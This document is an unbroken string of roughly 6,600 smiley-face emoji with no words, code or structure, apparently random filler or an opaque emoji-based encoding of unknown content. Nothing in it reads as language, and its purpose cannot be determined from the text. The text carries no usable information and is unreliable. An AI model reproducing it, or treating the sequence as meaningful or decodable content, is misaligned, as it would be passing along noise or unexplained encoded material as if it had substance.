😃😂😁😜😜😉🤪😃😝😉😇😆🤣😇😉🤣😆🤪🙂😂😝😀🤣🙃😅😄😆😊😁😆😇😝😃🤣😄🤪😜🙂😀😀😝🙃😇😄😊😊😉😆😝😝🙂😂😀😜🤣🙂😜😃😆😉😁😁😄😇😃😅🙃😝😜😂😃😜😝🙂🤪😃😊😇😉😁🙃😇🙂😅😉🤪🤣😂🤪😀😆🙃🙃😄😄😊😅😇😄😇😜🤣😁🤪😝🙂🙃😀😊🙃😊😄🙃😇😉😃😂😝🤣🤣😉😜😆🙂😂😃😄😉😃😁😀😊😜😊😉😝😝😂😃😜😊🙂😊😃🙃😉😇😁😂😇🤣🤣🤣🤪😆😂😂😀😄🙃😁😄😀😉😜😁🤪😇😝😜😆🤪😊😂😉😀🙃🙃🙃😄😂😊🤣😆😅😝😆🤣😁😜😄🙂😃😃😁😉😝😄🤪😊😝😆😇😝😁😂😄😜🙃🙂🙂😃😂🤪🤪🙃🙂😃🤣🙃😝😄😊😇😉😅🙂😝😉😅😄😊😊😁😇😇😊😅😉😁😂🤪😂😂😊😜😜🙂😊😃😝😉🤣😁😁😝😅😅😃😜😁😂😂😀😇🙃😉😊🤪😅😀😝🙃🤣🙂😜😂😜😊🙂🙃😄🙂😆🤪😀😂😊😄😉😂😂😃😜🤪🙂😝😃😇😜😉😉😅😅🤪😅🙂🤪😂😂🤣😀😅🙃😆😉😁😜😆🙂😃🤣🤣🤣😁🤪🤪😂😝😀😇😀😄🙂😊😄🤣😉😝🤣😝😂😁😜😅🙂😆😃😁😜😃😂😂😝🤣😅🙂😉🤪😄😅😁😝😝😉😅😄😝😃😄😉🙃😁😊🙃😂😉😂😆😀😁🙃😄😄😃😊😀😜😜😃🤪🙃😝🤪😆🙂😄😀😉🙃🙃😄🙂😀😂😊😄😁🤣😝😝😅🙂😜😆🙂😆🙃🙂😁😆😊🤪😆😝😝😇😝😊😅😊😜😄🙂😉😃😉🤣😉😇😊😅😆🤪😁😂😄🙃😀😆🤪🤣😝😃😁😉🤣🙂😁😜😃😜😆😂🙃😀🙂🙃😂🤣😝😃😉😊🙂😄😁😇🤪😅😄😜🙃😂😆😃😀😉😀😊😆😆😜😝😉🤣🙃😜🙂😝😅😂😂😃😄🙃🙃😄🙂😅🤪🤪😃😂😀😜😜😝😊😆🙂🙃🙃😝😉😄😁😂😄😊🙂😀😄🤣😃😉😄😜😆😁😜🤣😃😝😃🤣😀🤪😜🙃😀😊😃🙃😇😄😇😊😉😅😁😝🙂🤣😂😜🤣🙃😂😃😆😉😁😁😆😇😃😅🤣😝😜🤣🤪😜😝😉😇😃😊😉😉😁😊😇🙂😅🙃🤪🤣😂🤪😀😆😊😁😄😄😊😃😆😄😇😜🤣😀🤪😝🙂🙂😀😊🙃😉😄🙃😊🙂😆🙃😝🤣🤣🙂😜😆🙂😁😃😄😉😃😁😀😊😜😆😜😝😝🤣😇😜😊🙂😝😃🙃😉😇😁😂😇🤣😅😅🤪😆🙂😜😀😄🙃😄😄😀😇😜😄😝😇😝🤣😄🤪😊😂😜😀🙃😉😅😄😂😊😇😁😀😝😆🤣🙃😜😄🙃😝😃😀😉😀😄🤪😊😝😆😇😝😜😂😇😜🙃🙂🙂😃😂😇😄😁😅😇😅😅😁🤪😄🤣😆😀😀🙃😆😃🤪😉😝😁😇😇😊😅😉🤪🙃😜😃😀😂🙃😇😄😅😊😅😆😁😝😄🤣😃😃😀😂😜😀🤪😉😁😄😇😇😃😆😉😝😊🤣🙂😀🙃🙂🤣😃😅😉😇😁😁😇😁😅😃🤪😀🤣😜😃😀🙂😝😃😇😊😆😁😉😝😂😅🙂🤪😂😂🤣😃😂🙃😆😄😁😊😇😆😃😝😁😅😜🤪🤪😂😝😃🤪🙃😊😄😉😇😆😆🙂😝😜🤣🤣😜😅🙂😆😃😁😉😄😁😃😇🙂😆😜🤪🙃🤣😝😜🤪🙂😊😄😇😉🙃😁🙂😝😀😅🤣🤪🤣😂😆😀😁🙃😄😁😁😊😀😁😜😝🙂😅😝😜😁😂😊😀😉🙃🙃😁😉😊😂😆🤣🤪😀🤣😆😜🤪🙂😄😃😃😉😀😆😃😊🤪😆😝🤪🙂🤣😊😜😜🙂🙃😃🙂😉😂😁🤣😇😅😅😆🤪😇😂😄😀😝🙃😀😄😃😉🤪😁😝😇😇😅😊😜😆😂🙃😀🙂🙃😂😄🤣😊😅🤣😆😝😁🤣😄😜😊🙂😀😃🙃🙃🤪😁😉😊😇😆😊😝😉🤣🙃😀😃🙂😂😃😜😉😅😁🤪😇😁🤣😆🤪😃😂😀😀🙃🙂🤪😄😃😉😇😁😊😇😉😅🙃🤪🙂😂😂😀😇🙃😅😄🤪😊😁😆😁😝😃🤣🤣😉😅😂🤪😀🤪🙃😇😁😄😊😉😆😉😝🙂🤣🙃😜🤣🙂🙃😄🤣😉😁😁😄😇😃😅😂😝😜🤣😜😜😝🙂😇😊😁😉😉😁🙃😇🙂😅🙂🤪🤣😂😅😀😆🙃😁😄😄😊😃😆😀😝😀🙂🙃🤪😝😂😇😀😊😇🤪😄😝😊🙂😆😂😝🤣😇😇😅😅😜😀😂😂😁😂😁🤣😊😜😆🤪😝😝😉😜😆😃😜😇😂😉😃😅🙃😇😇🙂😄🙃🤪😁😂😄🙂😃🤪😊😅😆😜😝😜🤪😁😃😆😊🤪😉😂🙃🤪🙂😄😆😀🤣😉😀🙂😆😁🙃🤣🙃😜😄🙂😃😃😀😃😆🙃😇😄😝😉😝😁🤪😝😅😅🤪🙃🙃😃😂😉🤣😁😅😃🤣😊🙂😅😄😝😝🤣🙃😜😄😂😜😄😃😉😃😄😜😉😝😅😝🤪😂😂🙃😜😂🙂😇😃🙃😉😅😝😄😅🙃😜😂😂😜😀🤪🙃😝😂😊😃😝😊😆😁🤪😇😊🤣😊😜🙃😉😉🤪🤣😁😁😇😄🙃😃😃🙂😁🙃😆😅😆😝😃😜😊😃😁😉😇🙃😅🙂😃😅😁😀😝🙂🤪🙃🤪🤣😅😂😆😆😝😉😅😜🤪🤪😂😝😅😄😀😆🙃😇😃🤪🙃😊😁😇😝🙂🤣😊🤪🙃🙂😅😉😅😁😆😇😀😆😜😝🤪😝😊🤣😃😀😄🤪😀😀😇😁🙂😇😂😊🤣🤪😅😉😇🤣😆😅😄😃🙃😊😝😁😜😇🤪😅😝😁😃🤪🙃🤣🤪🤪😝🙂😝😄😁😉😊😆😅😝😁🤣😅😜🤣😂🤣😃😄🤣😁😇😄😆😝😝😇🤣😊😂😃🤪😉🙂😃😃😊🙃😊😇😊😅😆🤪😁😂😄😆🤣😀🤣🙂😆😃😇😊😃😁😜😊😜😇🙃😂🙂😀😂😂🤣🤪😃😁🤣😉🤣🙃😁😜😂😉😜😂😜😀🤪😅😝😁😆🤪🙂😇😉🙃😉😁😀😀😀🙂😂😃🤣😉😅😂😇😄🤣😉😆😄😊😊🙃😅🙂🤪🤣🤣🙂😉😁😁😊😇😉😅🙃🤪🙂😂😂😀🤣🙂😅🤣😁😊😅😆😀😝😀😅😜😀🤪😊😆🤣😆😝🤪🤪😊😃🤪😜😇😝😂🤣🤣😅😅😄😃😀😂😄😄😜😄😄😅😅😆😝😜🤣🤪😊😝😉😜😜😇😜🙃😜🙃😜😊🤪🙃🤪😅😂😆😆😁😀😅😄😊😃😁😀😀🤣😆😁😝🤪😇😂😊🤪😉🤪😝🙃🤣😃😉😀😂😇🤪🤣😇😜😆🙂😁😃😄😃😅😉😂😄😆😊😁😆😊😇😀🤣😊🙂😝😃😇😉🙂😁😂😇🤣😉😄😆😅🤪😁🙃😂😄😊😊🙃😆🙂😝😂🤣🤣😜😅😊😆😊🙃🙃🤪😊🙃😄😂😊🤣🤣😅😁😁😝🤣😂😄😆😃😃😄😊😇😄🤪😊😝😉😇😂😁🤪😇😆🤣😆🙂😂😇😊😀😁😅😇😆😅😁😁😃🙃😉😀🙂😅😂😉😁😀😊🤣😀😊😆😀🤣🤣😊🤣😜😉😃😄😜😊🤪😆😝😝😇🤣😊🤣😉😁😀😊😁😃😄🙃😝😄😇😊😊🙃😝😆😃😝😂🤣😂😊😉😃😜😉😆😁😁😇😄🙃🙂😆😅🤪😁😅😃😜😄🙂🤪😄😃😉😁😄😇😊😝😂😝😂😜😀😅🙃😆😄😁😀🙃😊😀😆😄😇😉🤣😃🤪😝🤣😝😜🤪🙂😜😃😝😄😂😝🤣🤣😅😝😆😇😂🙂😝😀😄😜😃😅😅😂😀😝🤪🤣😝😃😇🤣😂😜😀😃😉😜🙂😅😇😜😀😂🤪😀😝🙃😇😄😊😊😉🙂🙃😂🤪🤣😁😁😉🤪😊😂😉😀🙃😅😄😇😊😜🙂😀🤣😀🙂🙃😀😜😁🙂😄🙃😃😂🙃🙂🙃😄😀😀😝😝😇🤣😇😜😇🙂🙃😃🙂😉😂😁🤣😇😅😝😆😄🤪😊😄🙃🤣🙃😊😃😜😉🤪🙃😝🤣😜😇🤣🤣😉😁🙃😂😇🙃😂😄🤣😊😅😆😆😄😁🤣😄😜😄🙂😀😀😜🙃🤪😄😝😊😇😂😃🤣😇🤣🙃😜🙂🙂😂😃😉😉😅😁😅😇😁😂😊🤪😃😂😆😃😃🙂🤪😃😝😉😇😁😜😇😉😅😉🤪🙂😂😊😃🙂🙃😅😄😆😊😁😊😅😝😃🤣😃🤪😜🙃😀😝😝🙃😇😄😝😊😉😅🙂😝🙂🤣😂😜🤣🙂😅🙂😄😉😁😁😆😇😃😅😃😝😜😂😀😜😝🙃😄🤪😄😉😉😁😊😇🙂😇😉🤪🤣😂🤣😀😆🙃😁😄😄😊😅😅😄😇😜😅🤪🤪😝🤪😜😀😊🙃😊😄🙃😇😉😃😂😝🤣🤣😂😜😆🙃😄😃😄😉😃😁😀😊😜😜😆😝😝🤣🤪😜😊🙂😊😃🙃😉🙃😁😂😝🙂😅😅🤪😆😂😅😀😄😉😊😄😀😉😜😁🤪😝😜😅😇🤪😊😂😝😀🙃🙃😉😄😂😊🤣😆😅😜😆🤣😁😜😄🙂😆😃😀😉😄😄🤪😇🙃😆😇🤪😝🤣😉😜🙃🙂😇😃😂😉🙃😁😅😇😆😅😁😜😆😂😃😀😀🙃😆😃🤪😊😉😁😇😇😊😅😉😜😊😂🙂😀😂🙃😇😄😅😊🙂😆😁😝😄🤣😃😜😀😂😜😀🤪😉😀😄😇😇😃😆😉😝😊🤣🙂😀🙃🙂🤣😃😅😉🙂😁😁🤪🙂😅😃🤪😀🤣😜😜🤪🙂😝😃😇😉😝😁😉😇😝😅🙂🤪🙂😂🤣😃😂🙃😆😄😁😊😆😆😃😝😜😅😜🤪🤪😂😝😃🤪🙃😊😄😉😊😇😆🙂🤪😊🤣🤣😜😅🙂😆😃😁😉😄😁😃😇😄😆😜🤪😀🤣😝😜😝🙂😊😄😇😉🙃😁🙂😇🙃😅🤣😜😜😂😆😀😁🙃😄😁😁😊😀😁😜😝😃😅😝🤪🤪😂😊😀😉🙃🙃😆🙂😊😂😆🤣😝🙂🤣😆😜🤣🙂😄😃😝😉😀😆😃😊🤪😆😝🤪😀🤣😊😃🙂🙂🙃😃🙂😉😂😆🙂😇😅😅😆🤪🙂😂😄😄😅🙃😀😃😜😉🤪😆😜😇😇😅😊😜😀😂🙃😄😝🙃😂😄🤣😊😅😆😆😝😁🤣😄😜😆🙂😀😃😅🙃🤪😄😜😊😇😅😝😝😉🤣🙃😜😇🙂😂😁😇😉😅😁😆😇😁😅😄🤪😃😂😀😀😃🙂🤪😄😃😉😇😁😇😇😉🤣😊🤪🙂😂😂😀🙂🙃😅😁😁😊😁😆😄😝😃😂😄🤪😜😂🤪😃😀🙃😇😆😊😊😉😆🙃😝🙂🤣😂😜🤣🙂😅😃🤣😉😁😁😆😇😃😅😃😝😜🙂😀😜😝🙂😇😃😝😉😉😅😁😇🙂😅😂🤪🤣🙂😂😀😆🙃😁😄😅😊😃😆😄😇😜😅🤪🤪😝🙃😇😀😊🙃😉😄😇😊🙂😆😉😝🤣😂😃😜😆🙃😅😃😄😉😃😁😆😊😜😅😂😝😝🤣😇😜😊🙃😇😃🙃😉🙂😁😇😇🤣🤣😝🤪😆😂😁😀😄😉😁😄😀😉😜😆😆😇😝🙂😂🤪😊😂😉😀🙃🙃🙂😄😂😊🤣😆🙂😝😆🤣🙃😜😄🙂😁😃😀😊😃😄🤪😊😝😅😀😝😊🙂🤣😜🙃🙂🙂😃😂😉🤣😁😅😇😆😅😅🤪😄😂😅😀😀🙃😀😃🤪😊😜😁😇😇😊😅😇🤪🙃🙂😂😀😂🙃🤣😄😅😇🤣😆😁😝😄🤣😆😜😀🙃😜😀🤪🙃😝😄😇😊😊😆😉😝🙃🤣😉😜😂🙂🙂😃😅😉😅😁😁😝😆😅😃🤪😀😂😃😜🤪😉😂😃😇😉😊😁😉😝😊😅🙂🤪😂😂🙃😀😅🙃🤣😄😁😊😄😆😃😜😀😅😜🤪🤪🙂😀😀😇🙃🤪😄😉😇😅😆🙂🤪🙃🤣🤣😜😅🙂🙂😃😁😊🙃😁😃😇😀😆😜😜😀🤣😝😜😇🙃😀😃😉😝😃😁🙂😇😂😅🤣😜😂😂😆😀😁🙃🙂😄😃😇😝😁😜😇🤪😅😝🤪😇😂😊😀😉🙃😇😄🙂😊😝😆🤣😝😂🤣😆😀😅🙂😄😃😃😉😆😄😜😝😉😆😝😝😇🤣😊😜😉🙂🙃😃🙂😉🙃😁🤣😇🙃😅😆🤪😆😂😄😃😁🙃😀😃😜😊😀😁😝😝😊😅😊🤪😉😂🙃😃😉🙃😂😄🤣😊🙂😆😆😜😁🤣😄😜😃🙂😀😀😜🙃🤪😄😝😊🤪😆😊😝😇🤣🙃😜🙃🙂😂😄🙂😉😅😁😆😇😅😅😄😜😊😂😀😜😜🙂🤪😄😜😉😇😁😊😇😝😅🙃🤪😉😂😂😀🤣🙃😅😆😆😊😁😆😄😝😆🤣😀😜😄😂🤪😃🙃🙃😇😁😝😊😉😆🙃😝😇🤣😂😃😝🙂😅😃😆😉😁😆😆😇😃😅😀🤪😆🤣🤪😀🤪🙂😇😃😊😉😉😆😊😇🙂😅😂🤪😇😂😅😃😉🙃😁😄😄😊😃😆😀😇😜😅🤪😜😀😂😇😃😃🙃😉😄😊😊🙂😅🙃😝🤣🤣😅😜🙂🙂😁😄🤪😉😃😁😀😊😜😆🤪😝😝🤣😇😜😝🙂😉😃😝😉🙂😁🙂😇🤣🤣😂🤪😆😂😁😀😆🙃😃😄😜😉😜😁🤪😇😝🤣🤪🤪😊😂😉😀😇🙃🙂😆😂😊🤣😆😅😝😆🤣😁😜😄🙂😃😃😄🙃😜😁😀😊😝😆😝😝😊😂😇😜🙃🙂🙂😃🙃😉🤣😆😜😇😆😅😁🤪😄🙂😁😀😀🙂😜😄😃😉😝😁🤪😇😊😅😉🤪🙃🙃🙂😀😂🙃🤣😄🙂😊😆😆🤣😝😄🤣😝😜😀🙃😃😀🤪🙃😝😁😀😊😊😅😜😝🙃🤣🙂😜😂🙃🙂😃😅😉😆😁🙂😇😄🤣😉🤪😀🤣😜😜🤪🙃😜😃😇😉😊😆😀😇🙃🤣😉🤪😂😂🤣😀😅🙃😆😄😁😊😄😆😆😝😀🤣😅🤪🤪😂😜😀😇😉😝😄😉😊🙃😆😇😝😂🙂😄😜😅🙂😆😃😁😉😄😁😃😇😀😅😃😝🤪😂😃😜😇🙂😇😃😉😊😊😁🙂😇😂😅🙂🤪😅🙂😁😀😁🙃😄😄😃😇😄😁😜😇🤪🤣😀🤪😇🙃😊😀😉🙃🙃😄🙂😊😂😆🤣😝😅🤣🤣😜😁🙂😆😃😃😉😃😄😜😝😀😆😝😝😇🤣😝😜😉😉😁😃🙂😉😂😁🤣😝😂😅😆🤪😁😂😅😀😃🙃😃😃😜😉🤪😁😝🤪😇😅😊🤪😉😂😇😀🙂🙃😉😄🤣😝🙂😆😆😜😁🤣😄😜😃🙂😁😀😜😉😃😄😝😇😆😆😊😜😉🤣🙃😜🙂🙂😉😃🤣😉🙂😁😆😝🤪😅😄😀😃😂😀😜😜🙃😃😃😝😉😜😁😊😝🙂😅🙃😀🙂😂😂😀🤣🙃🙂😄😆😊🤣😆😄😝😁🤣😀😀😃😇🤣😀😝😉😀😄😊😝🤣😆🙃😝🙂🤣😂😜🤣😁😇😃😆😉😅😁😄😇😅😅😀🤪😀🤣🤪😀😜🙂😇😃😊😉😇😁🙃😝😂😅😂🤪🤣😂😅😃🤣🙃😁😄😄😊😆😆😀🤪😁😅🤪🤪😝😂😇😀😊🙃😉😄🙃😊😉😆😂😝🙂🤣😅😜😅🙂😁😃😄😉😃😁😀😇😃😆🤪😝😝🤣😇😜😇🙂😉😄😊😉🙂😁😂😇🙃😅😅😜😂😂😁😀😄🙃😃😁😄😉😜😁🤪😝😃😅😇😀😉😂😉😀🙃🙃🙂😁🙃😊🤣😆😅😝🙃🤣😁😜😇🙂😃😃😀🙃😜😆😀😊😝😆😇🤪😃🤣😉😄😁🙂🙂😃😂😉🤣😁😅😇😆😅😁🤪😅😂😃😀🤣🙂😜😄😀😉😝😆😇😇😊😅😉🤪😊😂🙂😃😊🙃🤣😄🙂😊😆😅😅😝😄🤣😃😜😁😂😜😀😜🙃😝😄😇😊😊🤣😉😝🙃🤣🙂😜😉🙂🤣😃🙂😉😆😅😅😇😄🤣😁🤪😀🤣😜😀😁🙂😝😄😄😉😊😁😉😇🙃😅🙂🤪😂😂🤣😀🙂🙃😆😄🙂😊😄😆😁😝😀😂😜🤪🤪😂😝😀😜🙃😊😄😝😊🙃😅🙂😝😂🙂🤣😜😅🙂😆😃🤣😉😄😁😆😇😀😂😀😝🤪🙂😝😜😇🙂😊😃😝😉🙃😁😊😇😂🤣😃🤪😅🙂🤣😀😁🙃😄😄🤣😊😀😆😆😇🤪😅😝🤪😇😂😊😀😉🙃🙃😄🤪😊😂😆🙂😝😅🤣😆😜😁🙂😄😃😃😉😀😁😆😊🤪😅😁😝😇🤣😊😜😉🙂🙃😃🙂😉😂😁🙃😇😅😅😆🤪😁😂😁😀😃😊🤣😃😜😉🤪😁🤪😇😇🤣😁🤪😉😂😉😀🙂🙃🤪😄🤣😊🙃😅🤣😝😁🤣😄😜😃🙂🙂😀😜🙃😜😄😝😇😀😅😝😝😉🤣🙃😜🙂🙂😊😃🤣😉🤣😁😆😇😁🤪😉🤪😃😂😀😜😜🙂😜😃😝😉😇😁😊😇😉😅🙃🤪🙂😂😂😀😂🙃🤣😄😆😊😁😆😄😝😆🤣😝🤪😜😂🤪😀😝🤪🤪🙃😀😄🙂😉😝😁😝😝🙃😆🙃😜🙃😂🙃😃😁😉😄😄🤣😊😆🤪😅🤣🤪😜😝🙂😇😃😊😄😄😁🙃😇🙃😅😂🤪🤣😂😅😀😆🙃😁😆😄😉😀😆😀😝😀😅🤪🤪🤪😂😇😀😇🙃😉😄😜😀😆😆😂😝🙂🤣😅😜😆🙂😁😃😁😉😃😁😃😊😜😆🤪😁😅🤣😇😜😊🙂😉😃😉😉🙂😁😂😇🤣😅😅😃😉😂😁😀😁🙃😃😄😄😉😜😁😜😇😝😅😇🙂😁😂😉😀🙃🙃🙂😄🙂😊🤣😆😅😝😆🤣😆😜😄🙂😃😃😀😉😁😄🤪😊😝😆😇😉😄😂😅😜🙃🙂🙂😃😂🤪🙃🙃😝😄😅😇😃😆🙃😝🤣😅😁😀😁😂😜😄😃😉😃😁😀🤣😁🤪🙃😂🙂😀😂😝🙃🙂😝😃😅😊😅😁😁😇😆🤣😆🤪😆🙂😀🤣😆😁😆😊😊😆😉😝🙃😊😀🤣😇😜😁😂🤣😃😄😉😄😄😊😊😅😂😅🤣😜😜🤪🙂😝😃😇😉😊😁😉🤪😜🙃🙂🤪🤪😂🤣😀😅🙃😆😄😁😀😁😆😃😝😀😅😜🤪🤪😂😝😀😇🙃😊😆😉😊🙃😆🙂😝😂🤣🤣😜😅🙂😆😃😅😉😄😅😃😇😀😆😜😝🤪🤣😝😜😇🙂😊😃😝😉🙃😅🙂😇😂😅🤣🤪😅😂😆😀😁🙃😄😄😄😊😀😅😃😇🤪😅😝🤪🤪😂😊😀🤪🙃🙃😄🙂😊😂😆🤣😝😅🤣😆😜😁🙂😄😃😁😉😀😁😀😊🤪😆😝😝😇🤣😊😜😉🙂🙃😃🙃😉😂😁🤣😇😅😅😆🤪😁😂😄😀😃🙃😀😄😀😊😀😁😝😇😇😅😊😃🤪😂😝😀🙂🙃😂😄🤣😄😇😉😅😁😇😝🤣🙂😂🙂😅😀😜🙃🤪😄😝😄😇😉🤪😁😊😝😅🤣😆🙃😃😃🤣😉😅😁😆😇🙃😃🙃🤪😃😂😀😜😜🙃😂😃😝😉😝😁😊😇😉😅🙃🤪😇🙂🙃😀🤣🙃😅😄😆😊😇😆😄😝😄🤣😀😀😃😆🤪😀😝🙃😝😄😊😊😊😆🙃😝🙂🤣😂😜🤣🤣😄😃😆😉😆😁😄😇😄😅😀🤪😀🤣🤪😀😜😅😇😃😊😉😊😁🙃😇😉😅😂🤪🤣😂😅😀😉😝😜😄😄😊😁😆😀😇😜😅🤪🤪🤪😂😇😀😇🙃😉😄🙃😃😀😆😂😝🤣🤣😅😜😆🙂😁😃😄😉😃😁😀😜😅😆🤪😝🤪🤣😇😜😝🙂😉😃😉😉🙂😁😊😝🙂😅😅🤪😆😂😁😀😄🙃😃😄😃😉😜😁🤪🤣😅😅😇🤪😊😂😉😀😉🙃🙂😄😂😊🤣😆🤣😝😆🤣😁😜😄🙂😅😃😀🙃😜😄🤪😅😁😅😁😝😊🤣😉😜🙃😇😇😂😇😃🙃😉🙃😁🤣😇😄😅😊😁🙂😀😆🙂😜😃🤪😉😝🙂😄😄😇😊😝😆🤪😁😜😃😀🙃🤣😄😅😊😆🙂🤣😁😉😇😄🤣😄🤪😀😂😃😃😃🙃😃😄😝😆😄😝😝🤣🙂😜😂🙂🤣😅😝😀🙃🙃😆😄🤣😅🙂🤪😀🤣😜😜🤪🙂😝😁😉😉😊😁😉😇🙃😅🙂🤪😂😂🤣😀😅😊😆😄😁😊😄😆😃😝😀😅😜🤪🤪🙂😀😀😇😊😊😄😉😊🙃😆🙂😝😂🤣🤣😜😅🙂🙂😃😁😇😄😁😃😇😀😆😜😝🤪🤣😝😜😇🙂😝😃😉😇🙃😁🙂😇😂😅🤣🤪😅😂😆😀😁🙃😁😄😃😊😀😁😜😇🤪😅😝🤪😇😂😝😀😉🙃😉😄🙂😊😂😆🤣😝😅🤣😆😜😁🙂😁😃😃😉😀😄😜😊🤪😆😝😝😇🤣😊😜😉🙂😉😃🙃😉😂😁🤣😇😅😊🙃🤪🙂😂😄😀😃🙃😀🙂😜😃😃🙃🤪😁🙂😇😂😜😄😂🙃😀🙂🙃😂😄🤣😃😉😆😆😝😆🤣😄😜😃🙂😀😀😜🙃🤪😁😜🙂😇😆😊😝😇🤣🙃😜🙃🙂😂😃🤣😉😅😁😉😀😜😅😄🤪😆😂😀😜😜🙂🤪😃🤪😉😇😁😝😇😉😅🙃🙂😅😂😂😀🤣🙃😅😄😅😊😁😆😄😝😃🤣😀🙂😇😂🤪😀😝🙃😇😄😊😊😉😆🙃😝🙂🤣😂😄😇🙂😅😃🤣😉😁😁😆😇😃😅😃😝😜🤣🤪😀🤪🙂😇😃😇😉😉😁😊😇🙂😅😂🤪🤣😂😅🙃😇🙃😁😄😄😊😃😆😃😇😜😅🤪🤪😝😂😝😀😊🙃😉😄🙃😊😇😆😂😝🤣🤣😅😊😊🙂😜😃😄😉😃😁😀😄🙂😇😃😁😇😝🙂😅😉🤪😝🙂😅😃😂😉😉😁😊😇😂😆🙃😂🤣😀😂🙃😃😄😀😉😜😉😄😁😄😊🤪🤣😀🤪😃😀😃😉😄😄😂😊🤣😆😅😁😝😝🤣😅🤪🤪😆😂😇😀🤪😉😃😁😄😊🤪😆😀😁😃😀😅🙂🙂😃😂😉🤣🙃😇😄🙃😇😂😆😅🤪😀🤣🤪😀😄🙃😄😀🤪😉😉😁😜😇😝😜😉😂🙂😀😂🙃🤣😁😂🙂😆😆😁😝😄🤣😃😜😁😂😜😀🤪🙃😝😁😄🙂😄😆😉😝🙃🤣🙂😜😊🙂🤣😃🤣😉😆😁😁😇😄😅😅😜😄🤣😜😜🤪🙂😝😄😀😉😊😁😊😇🙃😅😇😜🙃😂🤣😀😅🙃😆😁😀😊😄😆😄😝😀😂😃😊🤪😂😝😀😇🙃😊😄😊😊🙃😆🙂😝😂🤣😇😊😇🙂😆😃😁😉😄😁🙃😇😀😅😀😝🤪🤣😝😜😇🙂😜😄😇😉🙃😁🙂😇😂😅🤪🤪😅😂😅😀😁🙃🤣😁😁😊😀😁😜😇🤪🤣😉🤪😇😂😇😀😉😉😊😜🙂😊😂😆🤣😝😅🤣🙂😜😁🙂😄😃😃😉🤣😅😇😊🤪😆😝😝😇😂🙂😜😉🙂😉😃🙂😉🙂😁🤣😇🙃🤣🤣🤪😁😂😄😀😃🙃😝😃😜😉😜😁😝😝🤪😄😊🤪😉😂🙃😀🙂🙃🙃😄🤣😊😅😆😆😜😁😅😃😜😃🙂😀😀😜🙃🤪😄😝😇😀😆😊😝😉🤪😃😜🙂🙂🙂😃🤣😉🤣😁😆😇😁😅😄🤪😃😄😆😜😜🙂🤪😃😝😉🤪😁😊😇😇😅🙃🤪🙂🤣😉😀🤣🙃😅😄😆😊😁😆😄😝😃🤣😀🤪😜😃🤣😀😝🙃😇😄😊😊😊😆🙃😝🙂🤣😂😜🤣🙂😅😃😆😉😁😁😄😇😄😅🤪😝😜🤣🤪😜😝😄😄😄😆😉😉😁🙃😇🙂😉🤪😅😅🤪😂🤣😜😀🤣🙃😄😃😄😉😁😁😆😇😁😜😀😂😇😀😊🙃😉😂😄😄😊🙂🙂😇🤪🤣😉😜😆🙂😁😃😄🤪😝😂😁🤪😊🤣😁😇🙃🙃😜😜😊🙂😉😃🙃😉🙂😁😂😇🤣🙃😄😄😆😀🙃😀🙂🙃😃😄😀😉😜😇😁😜😃🤪😜😇😅😄🙃😀😆😅😜😄😊😊🤣😆😅😝😆😝😃😅😂😜🙃🙂😆😉😄😁😄😊😝😆😇😝😊😊🙂😅😉😜😅😂😇🤣😝😆😁😇😆😅😁🤪😄😊🙂🤣😅😀😁🤣😄😃😄😉😜😄🤪😊😜😅😂😝😇🤣🙂😀😆🙃🙃😄😂😝🙃😝🤣🤣😃😜😀😂😜😂😅😜🤪🙃🙃😄😀😂🤪🤪😃🤣🙂😜😂🙂🤣😅😝😀😂🙂😅😀😇🙃😉😁🙃😇😂😆🙃🙂😅😄😀😉😊😁😉😇🙃😉😂😀😄😅😝😉🙃😅😉😄😁😊😄😆😃😝😀😅😜😄🤪😇🤪😆😇🤣😄😁😀😊🙃😆🙂😝😂😜😁😁😄😜😅😝😅😊🤪😁😝😇😁😅🤣😝🤪🤣😝😜😇😇😜😂😜😃😇😉😇😁🙃😇😅😅🤪🙃😀😀😁🙃😄😄😃😇😄😆🙂😇🤪😅😝🤪😇🙂😃😀😉🙃🙃😄🙂😇🙃😆🤣😝😅🤣😅😜😁🙂😊😃😃😉😀😄😜😝🤪😆😝😝😇🤣😇😜😉🙂😉😃🙂😉🙂😁🤣🤪😅😅😆🤪😁😂😁😀😃🙃😃😃😜😊🤣😁😝😇😇😅😊🤪😉😂😉😀🙂🙃🙃😄🤣😊😂😆😆😝😂🤣😄😜😃🙂😀😀😜😊😂😄😝😊😝😆😊😜😉😄😜😜🙂🙂😇😃🤣😉🙃😁😆😇😅😅😄😜😁🙃🤣😜😜🙃😅😃😝😊🤣😁😊😇😉😅🙃😜😉😂😂😀🤣🙃😝😄😆😊🤪😆😄😝😃🤣😀😀😃😂🤪😀😝😉😅😄😊😊😜😆🙃😝🙂🤣😂😀🙂🙂😅😃😆😉😝😁😄😇😝😅😀😝😜🤣🤪😜😝🙂😇😃😊😊😃😁🙃😝😄😅😂🤪🙂😂😅😀😆🙃😁😄😄😊🤣😆😀😝🤣😅🤪🤪😜😂😇😃😃🙃😉😄🙃😊😝😆😂🤪😜🤣😅😜😅🙂😁😃😄😉😃😁😆😝😃😆🤪😝😝🤣😇😃😆🙂😉😃😉😉🙂😅😂😊😅😅😅🤪🙃😂😁😀🤣🙃😃😄😂😉😜😅😀😃😉😅😇😜😃😂😉😃😁🙃🙂😄😂😊🤣😅😂😝😆🤣😁😜🙃🙂😃😃😁🙃😜😄🤪😊😝😅🤪😝😊🤣😉😀😃🙂🙂😄😆😉🤣😁😅😇😆🤣😅🤪😄😂😃😀🙃🙂😜😄😄😉😝😁😇😇😊😅😉🤪🙃😂🙂😀😝🙃🤣😄🤪😊😆😆😅😝😄🤣😂😜😀😂😜😃😁🙃😝😆😅😊😊😆😊😝🙃🤣🤪😜😂🙂😉😄😂😉😆😁😁😇😄🤣😉🤪😀😂😀😜🤪😉😝🤪😄😉😊😁😜😇🙃😅😇🤪😂🙂😆😀😅🙃😆😅🙃😊😄😆🤣😝😀🤣😃🤪🤪😂🤪😀😇😉😃🤪😀😊🙃😆🙂😝😂🤣😇😜😅🙂😅😃😁😉😆😁😃😇😆🤣😃😝🤪🤣😝😜😇🙃😃😃😉😉😉😁🙂😇😂🤪🤪🤪😅😂😆😀😁🙃😁😄😃😊😀😁😜😇🤪😅😝🤪😇😂😊😀😉😉😁😄🙂😊😂😆🤣🤣😊🤣😊😜😁🙂😄😃😃🤪😁🙃🤪😄😇😊😊😆😃😇🤪🤣🤪🙂😃😄😀😉😂😁🤣😇😅🙃😇😆🤣😇😆😆😊😝🙃😂🙂😀🤣🙂🙂😇😆🤣😄🤪😉😂🙃😀🙂🤪😂🙃😄😃🤣😊😝😁🙂😝😆🤣😆😆😂😃🙃🙃🤪😄😝😊😇🙃😄😁😜😝😝😆😊🤪😇🙂🙂😃